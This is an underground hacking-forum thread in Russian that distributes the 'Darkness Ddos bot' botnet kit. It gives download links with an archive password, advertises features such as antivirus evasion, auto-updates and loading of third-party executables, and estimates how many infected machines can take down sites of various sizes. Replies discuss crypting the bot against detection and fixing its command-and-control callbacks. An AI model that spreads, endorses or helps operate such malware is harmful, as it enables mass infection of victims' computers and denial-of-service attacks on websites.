• XSS.stack #1 – первый литературный журнал от юзеров форума

Darkness Ddos bot v. 6m

Ar3s

Старожил форума
Легенда
Реакции
1 404
Ну вот и свершилось, делаем ботнет из серии Optima и бота Darkness Ddos bot пабликом.Благодаря личной мести

Небольшой мануал от автора про бота:

Первые же тесты показали что бот намного эффективнее предшественников (Black Energy, Illusion, etc...), его основные преимущества...

1) Работа в 100 потоков, без таймаутов. Потоки хорошо синхронизированы между собой, что дает возможность генерировать максимальное количество http трафика в единицу времени.
2) Возможность атаки по нескольким урл сервера (например форум, новостной блок, файловое хранилище). При таком виде атаки таргеты выбираются каждым экземмпляром бота отдельно, это в разы увелечивает нагрузку на сервер, ведь закешировать ответ невозможно.
3) Выбор ID случайным образом для каждой копии, не возможно закрыть атаку фильром браузера.
4) Малый вес, хорошая приживаемость в системе.
5) Бот "оборудован" анти-эвристикой.
6) Удобная и приятная панель управления, максимально оптимизированная для уменьшения нагрузки на свой сервер и бд. Имеет русский и английский интерфейс по выбору.
7) Автоапдейт. Боты обновляются до новой версии полностью автоматически.
8 ) Улучшеный, хитрый механизм прогрузки ЕХЕ с партнерских программ, сводящий к минимуму риск блокировки аккаунта.

Так же присутствуют все стандартные "фишки" п/о подобного класса - выбор типа атаки, загрузка и запуск ЕХЕ и прочее...

Из личной статистики:
30 ботов загружают форум средней посещаемости. Да, всего 30...
300 ботов - средний сайт.
1000 ботов - крупный сайт.
5000 кластер с сайтом, даже при использовании анти ддос, блокировки и прочих приблуд.
15-20 тысяч ботов, теоретически могут уработать "вконтакте.ру"

Весь мануал и видео в архиве
Пароль :forum.prologic.su
Скачать комплект!

[mod][Ar3s:] Материал не мой. Копипаст с другого форума. На склейку не тестил, админку не проверял. Юзать и тестить на свой страх и риск.[/mod]

Пожалуйста, обратите внимание, что пользователь заблокирован
Если не сложно,отпишитесь потом кто-нибудь кто разбирается в этом - нет ли склейки с троянов или еще чего?
Очень хочу протестировать этот бот, но опасаюсь.

В видео есть только изменение урла админки hex редактором. Хотя может быть у нас разное видео, или я чего-то не понимаю (я свое брал на хакер.ру).

И еще - а чем отличается "красная" и "синяя" версия? :blink:

Вот, пожалуйста http://www.sendspace.com/file/fyln9h
там 2 ехе, "красная" и "синяя" версии. Каждая в отдельном архиве.

На эксплоите не буду.
Погугли по описанию. Он уже много где лежит. Я сам на стороннем форуме наткнулся. И там было без хайда. Дабы никому не было обидно - я разместил под небольшим хайдом.

И еще - а чем отличается "красная" и "синяя" версия?
Цветовым оформлением и все.

Пробовал ставить себе, только на других форумах пишут optima v7..
Что-то отстук никакой..

Ребята я этого бота юзал..Покупал обновления.Сейчас перешел на новый стабильный продукт.
Данный бот нагружает тачку бота.Как "синия админка" (это 6 версия бота) так и "красная админка" (это 7 версия бота)Про них можете почитать в теме автора на хакзоне.
Так как пользовался данным продуктом больше 4 месяцев могу многое вам поведать.
Да он лучше чем блек енерджи,иллюзион и прочие паблик боты.
Например это :
Из личной статистики:
30 ботов загружают форум средней посещаемости. Да, всего 30...
300 ботов - средний сайт.
1000 ботов - крупный сайт.
5000 кластер с сайтом, даже при использовании анти ддос, блокировки и прочих приблуд.
15-20 тысяч ботов, теоретически могут уработать "вконтакте.ру"
1000 ботов - крупный сайт. - Вранье! 3000-3500 крупный.И то..И то повторяю.Бот не всегда.
5000 кластер с сайтом, даже при использовании анти ддос, блокировки и прочих приблуд.-это смешно.Сайт с кластером еще можно.АнтиДДОС только если он извиняюсь за выражение (спасает от паноса,а не от доса)..Блокировка и прочие приблуды)..-тут я под столом))Реально если посмотреть трезвым взглядом то это чушь так говорю потому что сам пользовался и сталкивался практически со всеми проблемами этого продукта.
За 15-20к не скажу нечего.Максимум держал 10к на нём.Боты мрут как мухи.Мало того что мрут,бот еще и плохо криптуется.Я думаю кто юзал его со мной согласяться.(не все крипторы беруться за него..Меня даже один чуть не послал :fuck: Сказал что передо мной еще 4 постучало за криптом этого бота)
Как я выше указал что ботбыстро мрёт..Даже если лоады чистые..вы на них льёте только этого бота и вдруг они мрут))то запустите данного бота на дедике и увидите через сутки сколько он будет тянуть проца :rtfm: (Не помню где но читал.."Данный бот нагружает комп до пиз**ца")
Как по мне так бот не достоин внимание.Хоть и лучше чем блек енерджи и иллюзион.
Что касается отстука 7-ки :angry2: я думаю все поняли что я хотел сказать.
Всё что я выше сказал являеться лиш моим мнением и только.Некого нечему не заставляю и не провоцирую.

[vallium], это печально.
У меня бот тоже кстати не отстукивает в админку. На эксплойте советовали не указывать адрес в хттп, ибо бот стучит на хттпС. Пока что не проверял, да и не знаю, стоит ли, если бот по качеству так себе.

я не превышал, специально сделал ссылку вида http://domain/b/i.php (чтобы base64 сделало ровно 40 символов), но бот не стучит.

может это поможет..Когда пользовалсяданным продуктом возникали проблемы с отстуком.При установки админки ты заливаеш БД(optima.sql) вроде так называется.Не поленись зайди потом в пхпмайадмин и через него залей еще раз.Админка после установки http://domain/sql/optima.sql покажет что всё отлично,но отстука может не быть.Мне помогло в своё время.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх